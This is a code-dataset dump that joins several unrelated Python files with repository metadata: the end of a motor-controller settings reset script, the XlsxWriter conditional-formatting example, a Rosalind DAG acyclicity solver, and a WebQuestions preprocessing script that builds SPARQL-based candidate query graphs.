stage_settings.SupplyVoltageMin = 0
stage_settings.SupplyVoltageMax = 0
stage_settings.MaxCurrentConsumption = 0
stage_settings.HorizontalLoadCapacity = 0
stage_settings.VerticalLoadCapacity = 0
result = lib.set_stage_settings(id, byref(stage_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
motor_information = motor_information_t()
motor_information.Manufacturer = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
motor_information.PartNumber = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
result = lib.set_motor_information(id, byref(motor_information))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
motor_settings = motor_settings_t()
class MotorType_:
MOTOR_TYPE_BLDC = 3
MOTOR_TYPE_DC = 2
MOTOR_TYPE_STEP = 1
MOTOR_TYPE_UNKNOWN = 0
motor_settings.MotorType = MotorType_.MOTOR_TYPE_UNKNOWN
motor_settings.ReservedField = 0
motor_settings.Poles = 0
motor_settings.Phases = 0
motor_settings.NominalVoltage = 0
motor_settings.NominalCurrent = 0
motor_settings.NominalSpeed = 0
motor_settings.NominalTorque = 0
motor_settings.NominalPower = 0
motor_settings.WindingResistance = 0
motor_settings.WindingInductance = 0
motor_settings.RotorInertia = 0
motor_settings.StallTorque = 0
motor_settings.DetentTorque = 0
motor_settings.TorqueConstant = 0
motor_settings.SpeedConstant = 0
motor_settings.SpeedTorqueGradient = 0
motor_settings.MechanicalTimeConstant = 0
motor_settings.MaxSpeed = 0
motor_settings.MaxCurrent = 0
motor_settings.MaxCurrentTime = 0
motor_settings.NoLoadCurrent = 0
motor_settings.NoLoadSpeed = 0
result = lib.set_motor_settings(id, byref(motor_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
encoder_information = encoder_information_t()
encoder_information.Manufacturer = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
encoder_information.PartNumber = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
result = lib.set_encoder_information(id, byref(encoder_information))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
encoder_settings = encoder_settings_t()
encoder_settings.MaxOperatingFrequency = 0
encoder_settings.SupplyVoltageMin = 0
encoder_settings.SupplyVoltageMax = 0
encoder_settings.MaxCurrentConsumption = 0
encoder_settings.PPR = 0
class EncoderSettings_:
ENCSET_REVOLUTIONSENSOR_ACTIVE_HIGH = 256
ENCSET_REVOLUTIONSENSOR_PRESENT = 64
ENCSET_INDEXCHANNEL_PRESENT = 16
ENCSET_PUSHPULL_OUTPUT = 4
ENCSET_DIFFERENTIAL_OUTPUT = 1
result = lib.set_encoder_settings(id, byref(encoder_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
hallsensor_information = hallsensor_information_t()
hallsensor_information.Manufacturer = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
hallsensor_information.PartNumber = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
result = lib.set_hallsensor_information(id, byref(hallsensor_information))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
hallsensor_settings = hallsensor_settings_t()
hallsensor_settings.MaxOperatingFrequency = 0
hallsensor_settings.SupplyVoltageMin = 0
hallsensor_settings.SupplyVoltageMax = 0
hallsensor_settings.MaxCurrentConsumption = 0
hallsensor_settings.PPR = 0
result = lib.set_hallsensor_settings(id, byref(hallsensor_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
gear_information = gear_information_t()
gear_information.Manufacturer = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
gear_information.PartNumber = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
result = lib.set_gear_information(id, byref(gear_information))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
gear_settings = gear_settings_t()
gear_settings.ReductionIn = 0
gear_settings.ReductionOut = 0
gear_settings.RatedInputTorque = 0
gear_settings.RatedInputSpeed = 0
gear_settings.MaxOutputBacklash = 0
gear_settings.InputInertia = 0
gear_settings.Efficiency = 0
result = lib.set_gear_settings(id, byref(gear_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
accessories_settings = accessories_settings_t()
accessories_settings.MagneticBrakeInfo = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
accessories_settings.MBRatedVoltage = 0
accessories_settings.MBRatedCurrent = 0
accessories_settings.MBTorque = 0
class MBSettings_:
MB_POWERED_HOLD = 2
MB_AVAILABLE = 1
accessories_settings.TemperatureSensorInfo = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
accessories_settings.TSMin = 0
accessories_settings.TSMax = 0
accessories_settings.TSGrad = 0
class TSSettings_:
TS_AVAILABLE = 8
TS_TYPE_BITS = 7
TS_TYPE_SEMICONDUCTOR = 2
TS_TYPE_THERMOCOUPLE = 1
TS_TYPE_UNKNOWN = 0
accessories_settings.TSSettings = TSSettings_.TS_TYPE_UNKNOWN
class LimitSwitchesSettings_:
LS_SHORTED = 16
LS_SW2_ACTIVE_LOW = 8
LS_SW1_ACTIVE_LOW = 4
LS_ON_SW2_AVAILABLE = 2
LS_ON_SW1_AVAILABLE = 1
result = lib.set_accessories_settings(id, byref(accessories_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
return worst_result
| [
"[email protected]"
]
| |
1aeaca94f2d4d9feb9733db3c8cad22d7ff94e80 | cf5b2850dc9794eb0fc11826da4fd3ea6c22e9b1 | /examples/conditional_format.py | 868eec6890126a075a32371064be80ab9628e826 | [
"BSD-2-Clause"
]
| permissive | glasah/XlsxWriter | bcf74b43b9c114e45e1a3dd679b5ab49ee20a0ec | 1e8aaeb03000dc2f294ccb89b33806ac40dabc13 | refs/heads/main | 2023-09-05T03:03:53.857387 | 2021-11-01T07:35:46 | 2021-11-01T07:35:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,956 | py | ###############################################################################
#
# Example of how to add conditional formatting to an XlsxWriter file.
#
# Conditional formatting allows you to apply a format to a cell or a
# range of cells based on certain criteria.
#
# SPDX-License-Identifier: BSD-2-Clause
# Copyright 2013-2021, John McNamara, [email protected]
#
import xlsxwriter
workbook = xlsxwriter.Workbook('conditional_format.xlsx')
worksheet1 = workbook.add_worksheet()
worksheet2 = workbook.add_worksheet()
worksheet3 = workbook.add_worksheet()
worksheet4 = workbook.add_worksheet()
worksheet5 = workbook.add_worksheet()
worksheet6 = workbook.add_worksheet()
worksheet7 = workbook.add_worksheet()
worksheet8 = workbook.add_worksheet()
worksheet9 = workbook.add_worksheet()
# Add a format. Light red fill with dark red text.
format1 = workbook.add_format({'bg_color': '#FFC7CE',
'font_color': '#9C0006'})
# Add a format. Green fill with dark green text.
format2 = workbook.add_format({'bg_color': '#C6EFCE',
'font_color': '#006100'})
# Some sample data to run the conditional formatting against.
data = [
[34, 72, 38, 30, 75, 48, 75, 66, 84, 86],
[6, 24, 1, 84, 54, 62, 60, 3, 26, 59],
[28, 79, 97, 13, 85, 93, 93, 22, 5, 14],
[27, 71, 40, 17, 18, 79, 90, 93, 29, 47],
[88, 25, 33, 23, 67, 1, 59, 79, 47, 36],
[24, 100, 20, 88, 29, 33, 38, 54, 54, 88],
[6, 57, 88, 28, 10, 26, 37, 7, 41, 48],
[52, 78, 1, 96, 26, 45, 47, 33, 96, 36],
[60, 54, 81, 66, 81, 90, 80, 93, 12, 55],
[70, 5, 46, 14, 71, 19, 66, 36, 41, 21],
]
###############################################################################
#
# Example 1.
#
caption = ('Cells with values >= 50 are in light red. '
'Values < 50 are in light green.')
# Write the data.
worksheet1.write('A1', caption)
for row, row_data in enumerate(data):
worksheet1.write_row(row + 2, 1, row_data)
# Write a conditional format over a range.
worksheet1.conditional_format('B3:K12', {'type': 'cell',
'criteria': '>=',
'value': 50,
'format': format1})
# Write another conditional format over the same range.
worksheet1.conditional_format('B3:K12', {'type': 'cell',
'criteria': '<',
'value': 50,
'format': format2})
###############################################################################
#
# Example 2.
#
caption = ('Values between 30 and 70 are in light red. '
'Values outside that range are in light green.')
worksheet2.write('A1', caption)
for row, row_data in enumerate(data):
worksheet2.write_row(row + 2, 1, row_data)
worksheet2.conditional_format('B3:K12', {'type': 'cell',
'criteria': 'between',
'minimum': 30,
'maximum': 70,
'format': format1})
worksheet2.conditional_format('B3:K12', {'type': 'cell',
'criteria': 'not between',
'minimum': 30,
'maximum': 70,
'format': format2})
###############################################################################
#
# Example 3.
#
caption = ('Duplicate values are in light red. '
'Unique values are in light green.')
worksheet3.write('A1', caption)
for row, row_data in enumerate(data):
worksheet3.write_row(row + 2, 1, row_data)
worksheet3.conditional_format('B3:K12', {'type': 'duplicate',
'format': format1})
worksheet3.conditional_format('B3:K12', {'type': 'unique',
'format': format2})
###############################################################################
#
# Example 4.
#
caption = ('Above average values are in light red. '
'Below average values are in light green.')
worksheet4.write('A1', caption)
for row, row_data in enumerate(data):
worksheet4.write_row(row + 2, 1, row_data)
worksheet4.conditional_format('B3:K12', {'type': 'average',
'criteria': 'above',
'format': format1})
worksheet4.conditional_format('B3:K12', {'type': 'average',
'criteria': 'below',
'format': format2})
###############################################################################
#
# Example 5.
#
caption = ('Top 10 values are in light red. '
'Bottom 10 values are in light green.')
worksheet5.write('A1', caption)
for row, row_data in enumerate(data):
worksheet5.write_row(row + 2, 1, row_data)
worksheet5.conditional_format('B3:K12', {'type': 'top',
'value': '10',
'format': format1})
worksheet5.conditional_format('B3:K12', {'type': 'bottom',
'value': '10',
'format': format2})
###############################################################################
#
# Example 6.
#
caption = ('Cells with values >= 50 are in light red. '
'Values < 50 are in light green. Non-contiguous ranges.')
# Write the data.
worksheet6.write('A1', caption)
for row, row_data in enumerate(data):
worksheet6.write_row(row + 2, 1, row_data)
# Write a conditional format over a range.
worksheet6.conditional_format('B3:K6', {'type': 'cell',
'criteria': '>=',
'value': 50,
'format': format1,
'multi_range': 'B3:K6 B9:K12'})
# Write another conditional format over the same range.
worksheet6.conditional_format('B3:K6', {'type': 'cell',
'criteria': '<',
'value': 50,
'format': format2,
'multi_range': 'B3:K6 B9:K12'})
###############################################################################
#
# Example 7.
#
caption = 'Examples of color scales with default and user colors.'
data = range(1, 13)
worksheet7.write('A1', caption)
worksheet7.write('B2', "2 Color Scale")
worksheet7.write('D2', "2 Color Scale + user colors")
worksheet7.write('G2', "3 Color Scale")
worksheet7.write('I2', "3 Color Scale + user colors")
for row, row_data in enumerate(data):
worksheet7.write(row + 2, 1, row_data)
worksheet7.write(row + 2, 3, row_data)
worksheet7.write(row + 2, 6, row_data)
worksheet7.write(row + 2, 8, row_data)
worksheet7.conditional_format('B3:B14', {'type': '2_color_scale'})
worksheet7.conditional_format('D3:D14', {'type': '2_color_scale',
'min_color': "#FF0000",
'max_color': "#00FF00"})
worksheet7.conditional_format('G3:G14', {'type': '3_color_scale'})
worksheet7.conditional_format('I3:I14', {'type': '3_color_scale',
'min_color': "#C5D9F1",
'mid_color': "#8DB4E3",
'max_color': "#538ED5"})
###############################################################################
#
# Example 8.
#
caption = 'Examples of data bars.'
worksheet8.write('A1', caption)
worksheet8.write('B2', "Default data bars")
worksheet8.write('D2', "Bars only")
worksheet8.write('F2', "With user color")
worksheet8.write('H2', "Solid bars")
worksheet8.write('J2', "Right to left")
worksheet8.write('L2', "Excel 2010 style")
worksheet8.write('N2', "Negative same as positive")
data = range(1, 13)
for row, row_data in enumerate(data):
worksheet8.write(row + 2, 1, row_data)
worksheet8.write(row + 2, 3, row_data)
worksheet8.write(row + 2, 5, row_data)
worksheet8.write(row + 2, 7, row_data)
worksheet8.write(row + 2, 9, row_data)
data = [-1, -2, -3, -2, -1, 0, 1, 2, 3, 2, 1, 0]
for row, row_data in enumerate(data):
worksheet8.write(row + 2, 11, row_data)
worksheet8.write(row + 2, 13, row_data)
worksheet8.conditional_format('B3:B14', {'type': 'data_bar'})
worksheet8.conditional_format('D3:D14', {'type': 'data_bar',
'bar_only': True})
worksheet8.conditional_format('F3:F14', {'type': 'data_bar',
'bar_color': '#63C384'})
worksheet8.conditional_format('H3:H14', {'type': 'data_bar',
'bar_solid': True})
worksheet8.conditional_format('J3:J14', {'type': 'data_bar',
'bar_direction': 'right'})
worksheet8.conditional_format('L3:L14', {'type': 'data_bar',
'data_bar_2010': True})
worksheet8.conditional_format('N3:N14', {'type': 'data_bar',
'bar_negative_color_same': True,
'bar_negative_border_color_same': True})
###############################################################################
#
# Example 9.
#
caption = 'Examples of conditional formats with icon sets.'
data = [
[1, 2, 3],
[1, 2, 3],
[1, 2, 3],
[1, 2, 3],
[1, 2, 3, 4],
[1, 2, 3, 4, 5],
[1, 2, 3, 4, 5],
]
worksheet9.write('A1', caption)
for row, row_data in enumerate(data):
worksheet9.write_row(row + 2, 1, row_data)
worksheet9.conditional_format('B3:D3', {'type': 'icon_set',
'icon_style': '3_traffic_lights'})
worksheet9.conditional_format('B4:D4', {'type': 'icon_set',
'icon_style': '3_traffic_lights',
'reverse_icons': True})
worksheet9.conditional_format('B5:D5', {'type': 'icon_set',
'icon_style': '3_traffic_lights',
'icons_only': True})
worksheet9.conditional_format('B6:D6', {'type': 'icon_set',
'icon_style': '3_arrows'})
worksheet9.conditional_format('B7:E7', {'type': 'icon_set',
'icon_style': '4_arrows'})
worksheet9.conditional_format('B8:F8', {'type': 'icon_set',
'icon_style': '5_arrows'})
worksheet9.conditional_format('B9:F9', {'type': 'icon_set',
'icon_style': '5_ratings'})
workbook.close()
| [
"[email protected]"
]
| |
a7db3aafce35b88f549ace0cd7c17cbf0a387681 | 5005531655078e12546aba6b727dfa390acf3b2f | /src/python/dag.py | 0e5ed778d8ab13c47b050ed8443692b92c029af1 | []
| no_license | davidb2/rosalind | ee9201e2f79150a69389f702cf5926b42b6bce9f | c59930d3341e17d9f9f29c3b6c39d44f845d3215 | refs/heads/master | 2022-09-23T17:23:57.206469 | 2020-06-07T01:34:32 | 2020-06-07T01:34:32 | 187,707,621 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 977 | py | #!/usr/bin/env python3.6
import argparse
from queue import Queue
def acyclic(v, e, indeg, outdeg):
unseen = set(range(1, v+1))
bfs = Queue()
for u in unseen:
if len(indeg[u]) == 0:
bfs.put(u)
while len(unseen) > 0:
if bfs.empty(): return False
top = bfs.get()
for out in outdeg[top]:
indeg[out].remove(top)
if len(indeg[out]) == 0:
bfs.put(out)
unseen.remove(top)
return True
def main(args):
k = int(input())
ans = []
for _ in range(k):
input()
v, e = tuple(map(int, input().split()))
indeg = {u: set() for u in range(1, v+1)}
outdeg = {u: set() for u in range(1, v+1)}
for _ in range(e):
a, b = tuple(map(int, input().split()))
indeg[b].add(a)
outdeg[a].add(b)
ans.append(+1 if acyclic(v, e, indeg, outdeg) else -1)
print(' '.join(map(str, ans)))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
args = parser.parse_args()
main(args)
| [
"[email protected]"
]
| |
3ce92a8f6ac6d21f309094192a22f27c0ba533f5 | 68dc6c82d1c8bd81b8aca375d71d18cc577aa350 | /TextRay/hybridqa/preprocessing/webq/trainDataGen.py | aed9db58d879509a1a5801b283ceadb587bde22c | []
| no_license | umich-dbgroup/TextRay-Release | 3fdbfefda9d6d94b70e810ceb2e0fa95a55949e0 | e25087b594db106382f5dbc9cd2adfcc39cd286f | refs/heads/master | 2022-01-25T19:03:44.577009 | 2019-08-16T13:00:00 | 2022-01-18T02:45:22 | 203,634,858 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,489 | py | import os
import json
from kbEndPoint.utils.sparql import sparqlUtils
from preprocessing import stringUtils
from preprocessing import metricUtils
import numpy as np
import nltk
import codecs
import pandas as pd
PREFIX = "/Users/funke/webq"
#
# RAW_QUESTION_PATH = os.path.join(PREFIX, "data/webquestions.examples.train.json")
# QUESTION_PATH = os.path.join(PREFIX, "data/train.json")
# SMART_TOPIC_PATH = os.path.join(PREFIX, "SMART/webquestions.examples.train.e2e.top10.filter.tsv")
# ALL_TOPIC_PATH = os.path.join(PREFIX, "topics/train.csv")
# CANDS_DIR = os.path.join(PREFIX, "cands-train")
# CANDS_WTIH_CONSTRAINTS_DIR = os.path.join(PREFIX, "cands_with_constraints-train")
# CANDS_WTIH_CONSTRAINTS_DIR_DEDUP = os.path.join(PREFIX, "cands_with_constraints-train")
# CANDS_WTIH_CONSTRAINTS_RESCALED_DIR = os.path.join(PREFIX, "cands_with_constraints_rescaled-train")
RAW_QUESTION_PATH = os.path.join(PREFIX, "data/webquestions.examples.test.json")
QUESTION_PATH = os.path.join(PREFIX, "data/test.json")
CANDS_DIR = os.path.join(PREFIX, "cands-test")
CANDS_WTIH_CONSTRAINTS_DIR = os.path.join(PREFIX, "cands_with_constraints-test")
CANDS_WTIH_CONSTRAINTS_DIR_DEDUP = os.path.join(PREFIX, "cands_with_constraints-test")
SMART_TOPIC_PATH = os.path.join(PREFIX, "SMART/webquestions.examples.test.e2e.top10.filter.tsv")
ALL_TOPIC_PATH = os.path.join(PREFIX, "topics/test.csv")
CANDS_WTIH_CONSTRAINTS_RESCALED_DIR = os.path.join(PREFIX, "cands_with_constraints_rescaled-test")
ANS_CONSTRAINT_RELATIONS = ["people.person.gender", "common.topic.notable_types", "common.topic.notable_for"]
class Constraint(object):
def __init__(self, mid, name, relation, is_ans_constraint, surface_form, st_pos, length):
self.mid = mid
self.name =name
self.relation = relation
self.is_ans_constraint = is_ans_constraint
self.surface_form = surface_form
self.st_pos = st_pos
self.length = length
def __str__(self):
return str(self.mid) + " " + str(self.name) + " " + str(self.relation) + " " + str(self.is_ans_constraint)
class Smart_Entity(object):
def __init__(self, line):
split_line = line.strip().split('\t')
self.q_id = split_line[0]
self.surface_form = split_line[1]
self.st_pos = int(split_line[2])
self.length = int(split_line[3])
mid = split_line[4]
if mid.startswith('/'):
mid = mid[1:].replace('/', '.')
self.mid = mid
self.e_name = split_line[5]
self.score = float(split_line[6])
def __str__(self):
return str(self.surface_form) + " (" + str(self.mid) + "," + str(self.e_name) + ")"
class WebQuestionsEndPoint(object):
def __init__(self):
self.sparql = sparqlUtils()
self.topic_entity_dict = {}
self.cache_maxsize = 10000
self.cvt_constraints_cache = {}
self.cvt_constraints_cache_elements_fifo = []
self.topic_entity_dict = {}
self.type_dict = {}
self.type_name_dict = {}
self.all_path_entity_cache = {}
self.entity_name_cache={}
def write_top_entities(self, entity_linking_path, ques_src, dest_topic_path):
names = ['ques_id', 'mention', 'begin_index', 'length', 'mid', 'name', 'score']
df = pd.read_csv(entity_linking_path, delimiter='\t', names=names)
df = df.dropna()
df['mid'] = df['mid'].apply(lambda mid: mid[1:].replace('/', '.'))
df = df.sort_values(['ques_id', 'score'], ascending=[True, False])
df = df.drop_duplicates(subset=['ques_id', 'mid'])
# df = df.groupby('ques_id').reset_index(drop=True)
df.to_csv(dest_topic_path, index=False, encoding='utf-8')
def get_cands(self, ques_src, topic_src, dest_dir):
if not os.path.exists(dest_dir):
os.mkdir(dest_dir)
topics_df = pd.read_csv(topic_src)
file_json = json.load(open(ques_src, 'r'))
questions = file_json
for question in questions:
questionId = question["QuestionId"]
# if questionId != "WebQTrn-158":
# continue
print questionId
dest_path = os.path.join(dest_dir, questionId + ".json")
if os.path.exists(dest_path):
continue
topic_entities = topics_df[topics_df["ques_id"] == questionId].to_dict(orient='records')
candidates = {}
for e in topic_entities:
topic_entity = e['mid']
if topic_entity in self.all_path_entity_cache:
cands = self.all_path_entity_cache[topic_entity]
print ("found")
else:
# print(topic_entity)
cands = []
one_step = self.sparql.one_hop_expansion(topic_entity)
for cand in one_step:
relations = [cand[0]]
cands.append({"relations": relations, "counts": cand[1],
"entities": self.sparql.eval_one_hop_expansion(topic_entity, rel1=cand[0])})
two_step = self.sparql.two_hop_expansion(topic_entity)
for cand in two_step:
relations = [cand[0], cand[1]]
cands.append({"relations": relations, "counts": cand[2],
"entities": self.sparql.eval_two_hop_expansion(topic_entity, rel1=cand[0], rel2=cand[1])})
candidates[topic_entity] = cands
self.all_path_entity_cache[topic_entity] = cands
with open(dest_path, 'w+') as fp:
json.dump(candidates, fp, indent=4)
'''Add core constraints'''
def generate_query_graph_cands(self, ques_src, topic_src, core_chain_path, dest_dir):
topics_df = pd.read_csv(topic_src)
questions = json.load(open(ques_src, 'r'))
ans_dict = {}
ques_str_dict = {}
for question in questions:
qid = question["QuestionId"]
ques_str_dict[qid] = question["ProcessedQuestion"]
ans_dict[qid] = question['Answers']
if not os.path.exists(dest_dir):
os.makedirs(dest_dir)
files = [f for f in os.listdir(core_chain_path) if os.path.isfile(os.path.join(core_chain_path, f))]
for f in files:
if ".DS_Store" in f:
continue
q_id = f.replace(".json", "")
ques_string = ques_str_dict[q_id]
if os.path.exists(os.path.join(dest_dir, q_id + ".json")):
print("exists " + str(q_id))
continue
ques_query_graph_cands = {}
try:
file_json = json.load(open(os.path.join(core_chain_path, f), 'r'))
except:
print(f)
continue
links_df = topics_df[topics_df["ques_id"] == q_id]
links = links_df.to_dict(orient='records')
print("Question " + q_id)
for mid in file_json.keys():
topic_entity_names = links_df[links_df['mid'] == mid]['mid'].values
if len(topic_entity_names) == 0:
print('should have a topic entity name in topics path {}'.format(mid))
continue
print(mid)
topic_entity_name = topic_entity_names[0]
answers = ans_dict[q_id]
paths = file_json[mid]
entity_query_graph_cands = []
for path in paths:
main_relation = path["relations"]
print main_relation
constraints = self.__get_constraint_candidates__(ques_string, mid, topic_entity_name, main_relation, links)
cands = self.__get_query_graph_cands__(mid, main_relation, constraints, answers)
entity_query_graph_cands.extend(cands)
ques_query_graph_cands[mid] = entity_query_graph_cands
print("topic {} candidates size {}".format(mid, len(entity_query_graph_cands)))
with open(os.path.join(dest_dir, q_id + ".json"), 'w+') as fp:
json.dump(ques_query_graph_cands, fp, indent=4)
def _add_cvt_to_cache(self, cvt_key, cvt_paths):
self.cvt_constraints_cache_elements_fifo.append(cvt_key)
self.cvt_constraints_cache[cvt_key] = cvt_paths
if len(self.cvt_constraints_cache_elements_fifo) > self.cache_maxsize:
to_delete = self.cvt_constraints_cache_elements_fifo.pop(0)
del self.cvt_constraints_cache[to_delete]
def __get_constraint_candidates__(self, ques_str, topic_entity, topic_entity_name, relation_path, links):
candidates = []
for link in links:
if metricUtils.jaccard_ch(topic_entity_name.lower(), link["mention"].lower()) > 0.4: continue
if link["mid"] == topic_entity: continue
if len(relation_path) == 2:
rel_key = str(relation_path)
if rel_key in self.cvt_constraints_cache:
cvt_constraints = self.cvt_constraints_cache[rel_key]
else:
cvt_constraints = self.sparql.get_all_cvt_constraints(topic_entity, relation_path, False, link["mid"])
self._add_cvt_to_cache(rel_key, cvt_constraints)
for rel in cvt_constraints:
candidates.append(Constraint(link["mid"], link["name"], rel, False, link["mention"], link["begin_index"], link["length"]))
relation_id = str(relation_path)
if relation_id in self.type_dict:
type_mids_rels = self.type_dict[relation_id]
else:
type_mids_rels = self.sparql.get_ans_constraint_candidates(topic_entity, relation_path, ANS_CONSTRAINT_RELATIONS, False)
self.type_dict[relation_id] = type_mids_rels
for mid in type_mids_rels.keys():
if mid in self.type_name_dict:
names = self.type_name_dict[mid]
else:
names = self.sparql.get_names(mid)
self.type_name_dict[mid] = names
if names is None or len(names) == 0:
continue
match = stringUtils.match_names_to_mention(ques_str, names.split("/"))
if match is None:
continue
candidates.append(Constraint(mid, names, type_mids_rels[mid], True, match[0], match[1], match[1] + match[2]))
return candidates
def __get_query_graph_cands__(self, topic_entity, main_relation, constraints, ans_entities):
constraint_combinations = self.__get_constraint_combinations__(constraints)
answer_entities = set(ans_entities)
cands = []
for combination in constraint_combinations:
entity_names = set(self.sparql.eval_all_constraints_named(topic_entity, main_relation, combination, False))
# entity_names = set()
# for e in entities:
# if e in self.entity_name_cache:
# entity_names.add(self.entity_name_cache[e])
# else:
# entity_name = self.sparql.get_names(e)
# self.entity_name_cache[e] = entity_name
# entity_names.add(entity_name)
# common = entities.intersection(answer_entities)
# reward = float(len(common)) / max(1.0, (len(entities) + len(answer_entities) - len(common)))
if len(answer_entities) == 0:
reward = 0,0,0
else:
reward = metricUtils.compute_f1(answer_entities, entity_names)
cand = {"relations": main_relation,
"entities": list(entity_names),
"constraints": [ob.__dict__ for ob in combination],
"reward": reward}
cands.append(cand)
return cands
def __get_constraint_combinations__(self, constraint_candidates):
if len(constraint_candidates) == 0:
return [[]]
elif len(constraint_candidates) == 1:
return [[], [constraint_candidates[0]]]
conflicts = self.__get_conflicts__(constraint_candidates)
constraint_combinations = self.__dfs_search_combinations__(conflicts)
cand_lists = []
cand_lists.append([])
for constraint_combination in constraint_combinations:
cand_list = [constraint_candidates[i] for i in constraint_combination]
cand_lists.append(cand_list)
return cand_lists
def __get_conflicts__(self, constraint_candidates):
cand_size = len(constraint_candidates)
conflict_matrix = []
# conflict matrix (adjacent format)
for i in range(cand_size):
vec = [i]
for j in range(i + 1, cand_size):
cand_1 = constraint_candidates[i]
cand_2 = constraint_candidates[j]
conflict = cand_1.st_pos <= cand_2.st_pos + cand_2.length \
and cand_2.st_pos <= cand_1.st_pos + cand_1.length
if conflict: vec.append(j)
conflict_matrix.append(vec)
return conflict_matrix
def __dfs_search_combinations__(self, mat):
ret_comb_list = []
n = len(mat)
status = np.ones((n,), dtype='int32')
stack = []
ptr = -1
while True:
ptr = self.__nextPick__(ptr, status)
if ptr == -1: # backtrace: restore status array
if len(stack) == 0: break # indicating the end of searching
pop_idx = stack.pop()
for item in mat[pop_idx]: status[item] += 1
ptr = pop_idx
else:
stack.append(ptr)
for item in mat[ptr]: status[item] -= 1
comb = list(stack)
ret_comb_list.append(comb)
return ret_comb_list
def __nextPick__(self, ptr, status):
n = len(status)
for new_ptr in range(ptr + 1, n):
if status[new_ptr] == 1:
return new_ptr
return -1
def get_lookup_key(self, topic, rel_data):
if "constraints" in rel_data:
look_up_key = topic + "_" + str(rel_data["relations"]) + "_" + str(rel_data["constraints"])
else:
look_up_key = topic + "_" + str(rel_data["relations"])
return look_up_key
def deduplicate(self, input_path, src_dir, dest_dir):
questions = json.load(codecs.open(input_path, 'r', encoding='utf-8'))
if not os.path.exists(dest_dir):
os.makedirs(dest_dir)
for q in questions:
ques_id = q["QuestionId"]
ques_path = os.path.join(src_dir, ques_id + ".json")
if not os.path.exists(ques_path):
continue
print(ques_id)
main_entity_paths = json.load(codecs.open(ques_path, 'r', encoding='utf-8'))
look_up_keys = set()
main_entity_paths_dedup = {}
for topic in main_entity_paths:
paths = []
for path in main_entity_paths[topic]:
look_up_key = self.get_lookup_key(topic, path)
if look_up_key in look_up_keys:
continue
look_up_keys.add(look_up_key)
paths.append(path)
print("{} deduplicated to {}".format(len(main_entity_paths[topic]), len(paths)))
if len(paths) > 0:
main_entity_paths_dedup[topic] = paths
with open(os.path.join(dest_dir, ques_id + ".json"), 'w+') as fp:
json.dump(main_entity_paths_dedup, fp, indent=4)
def add_ids(self, src, dest):
questions = json.load(codecs.open(src, 'r', encoding='utf-8'))
to_write_json = []
for i, ques in enumerate(questions):
ques_id = "WebQTest-{}".format(i)
ques["QuestionId"] = ques_id
ques["ProcessedQuestion"] = ques["utterance"]
answer_set = set([])
target_value = ques['targetValue']
target_value = target_value[6: -1]
target_value = target_value.replace(') (', ')###(')
spt = target_value.split('###')
for item in spt:
ans_str = item[13: -1]
if ans_str.startswith('"') and ans_str.endswith('"'):
ans_str = ans_str[1: -1]
if isinstance(ans_str, unicode):
ans_str = ans_str.encode('utf-8')
answer_set.add(ans_str)
ques["Answers"] = list(answer_set)
to_write_json.append(ques)
with open(dest, 'w+') as fp:
json.dump(to_write_json, fp, indent=4)
def reward_with_max_f1(self, main_entity_paths):
max_reward = 0, 0, 0
for topic in main_entity_paths:
for path in main_entity_paths[topic]:
if path["reward"][2] > max_reward[2]:
max_reward = path["reward"]
return max_reward
def rescale_rewards_max(self, src_dir, dest_dir):
if not os.path.exists(dest_dir):
os.makedirs(dest_dir)
files = [f for f in os.listdir(src_dir)]
for f in files:
if ".DS_Store" in f:
continue
ques_id = f.replace(".json", "")
#print(ques_id)
ques_path = os.path.join(src_dir, f)
main_entity_paths = json.load(codecs.open(ques_path, 'r', encoding='utf-8'))
max_ques_reward = self.reward_with_max_f1(main_entity_paths)
for topic in main_entity_paths:
for path in main_entity_paths[topic]:
path["rescaled_reward"] = [path["reward"][0], path["reward"][1], path["reward"][2]]
if max_ques_reward[2] > 0:
reward = path["rescaled_reward"]
reward[2] = float(reward[2]) * 1.0 / float(max_ques_reward[2])
if max_ques_reward[0] > 0:
reward[0] = min(1.0, float(reward[0]) * 1.0 / float(
max_ques_reward[0])) # hacky way of clipping
if max_ques_reward[1] > 0:
reward[1] = min(1.0, float(reward[1]) * 1.0 / float(
max_ques_reward[1])) # hacky way of clipping
with open(os.path.join(dest_dir, ques_id + ".json"), 'w+') as fp:
json.dump(main_entity_paths, fp, indent=4)
